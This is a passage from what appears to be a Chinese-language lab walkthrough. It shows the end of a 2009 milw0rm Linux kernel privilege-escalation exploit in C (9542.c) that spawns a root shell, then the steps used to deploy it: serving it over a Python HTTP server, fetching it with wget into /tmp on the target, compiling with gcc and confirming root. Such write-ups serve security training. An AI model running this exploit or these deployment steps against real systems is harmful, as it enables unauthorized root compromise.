if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
x0x.sa_family=AF_UNSPEC;
memset(x0x.sa_data,0x82,14);
memset((char *)buf,0,sizeof(buf));
sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
if(getuid()==uid){
printf("[-] exploit failed, try again\n");
return -1;
}
close(fd);
execl("/bin/sh","sh","-i",NULL);
return 0;
}
/* eoc */
// milw0rm.com [2009-08-31]
开启python的临时http服务
python -m http.server 80
shell窗口下载脚本,tmp目录在Linux系统中用于存放临时文件,切换到tmp目录下载脚本。
cd /tmp
pwd
wget http://192.168.251.168/9542.c
ls
成功下载,对文件进行编译并执行。
gcc 9542.c -o exp
./exp
whoami
获取到root用户权限。
扫一扫
2822
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
